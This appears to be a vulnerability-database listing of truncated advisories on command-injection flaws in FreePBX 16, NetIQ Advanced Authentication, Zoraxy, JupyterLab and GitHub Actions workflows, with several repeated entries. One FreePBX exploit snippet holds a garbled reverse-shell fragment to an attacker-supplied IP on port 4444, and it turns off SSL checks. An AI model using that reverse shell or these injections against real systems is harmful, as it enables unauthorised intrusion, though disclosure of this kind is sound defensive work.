CVE-2024-58294

FreePBX 16 contains an authenticated remote code execution vulnerability in the API module that allows attackers with valid session credentials to execute arbitrary commands. Attackers can exploit the 'generatedocs' endpoint by crafting malicious POST requests with bash command injection to...

CVE-2024-58294 FreePBX 16 Authenticated Remote Code Execution via API Module

FreePBX 16 contains an authenticated remote code execution vulnerability in the API module that allows attackers with valid session credentials to execute arbitrary commands. Attackers can exploit the 'generatedocs' endpoint by crafting malicious POST requests with bash command injection to...

EUVD-2021-24593

Malware in sbrugna...

EUVD-1999-0234

Malware in sbrugna...

EUVD-2020-20051

Malware in sbrugna...

PT-2025-33340 · Unknown +2 · Homeassistant-Tapo-Control +3

Name of the Vulnerable Software and Affected Versions: HomeAssistant-Tapo-Control versions prior to commit 2a3b80f Description: HomeAssistant-Tapo-Control, a component offering control for Tapo cameras within Home Assistant, contained a code injection vulnerability in the GitHub Actions workflow...

CVE-2021-38120

A vulnerability identified in Advance Authentication that allows bash command Injection in administrative controlled functionality of backup due to improper handling in provided command parameters. This issue affects NetIQ Advance Authentication version before 6.3.5.1...

CVE-2024-52010

Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. A command injection vulnerability in the Web SSH feature allows an authenticated attacker to execute arbitrary commands as root on the host. Zoraxy has a Web SSH terminal feature that allows authenticated users to connect to SSH...

NetIQ Advanced Authentication Command Execution Vulnerability

NetIQ Advanced Authentication is an application from NetIQ UK. It provides a more secure way to protect your sensitive information by moving away from usernames and passwords. A command execution vulnerability exists in NetIQ Advanced Authentication versions prior to 6.3.5.1, which can be exploit...

CVE-2024-43805 HTML injection in Jupyter Notebook and JupyterLab leading to DOM Clobbering

jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. This vulnerability depends on user interaction by opening a malicious notebook with Markdown cells, or Markdown file using JupyterLab preview feature. A malicious user c...

CVE-2021-38120

A vulnerability identified in Advance Authentication that allows bash command Injection in administrative controlled functionality of backup due to improper handling in provided command parameters. This issue affects NetIQ Advance Authentication version before 6.3.5.1...

CVE-2021-38120 Remote Code Execution using Bash command Injection in backup scheduling functionality in NetIQ Advance Authentication

A vulnerability identified in Advance Authentication that allows bash command Injection in administrative controlled functionality of backup due to improper handling in provided command parameters. This issue affects NetIQ Advance Authentication version before 6.3.5.1...

CVE-2021-38120 Remote Code Execution using Bash command Injection in backup scheduling functionality in NetIQ Advance Authentication

A vulnerability identified in Advance Authentication that allows bash command Injection in administrative controlled functionality of backup due to improper handling in provided command parameters. This issue affects NetIQ Advance Authentication version before 6.3.5.1...

PT-2024-10988 · Netiq · Netiq Advance Authentication

Name of the Vulnerable Software and Affected Versions: NetIQ Advance Authentication versions prior to 6.3.5.1 Description: A vulnerability identified in Advance Authentication allows bash command injection in administrative controlled functionality of backup due to improper handling in provided...

CVE-2020-11847

SSH authenticated user when access the PAM server can execute an OS command to gain the full system access using bash. This issue affects Privileged Access Manager before 3.7.0.1...

FreePBX 16 - Remote Code Execution (Authenticated) Exploit

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; echo $response =...

CVE-2023-34111

The Release PR Merged workflow in the github repo taosdata/grafanaplugin is subject to a command injection vulnerability which allows for arbitrary code execution within the github action context due to the insecure usage of $ github.event.pullrequest.title in a bash command within the GitHub...

CVE-2023-34111 Command Injection Vulnerability in `Release PR Merged` Workflow in taosdata/grafanaplugin

The Release PR Merged workflow in the github repo taosdata/grafanaplugin is subject to a command injection vulnerability which allows for arbitrary code execution within the github action context due to the insecure usage of $ github.event.pullrequest.title in a bash command within the GitHub...

CVE-2023-34111

The CVE-2023-34111 entry concerns a command-injection in the taosdata/grafanaplugin Release PR Merged GitHub Action workflow. Insecurely passing the PR title via ${{ github.event.pull_request.title }} into a bash command allows an attacker to execute arbitrary code within the workflow context, po...

CVE-2023-34111

The Release PR Merged workflow in the github repo taosdata/grafanaplugin is subject to a command injection vulnerability which allows for arbitrary code execution within the github action context due to the insecure usage of $ github.event.pullrequest.title in a bash command within the GitHub...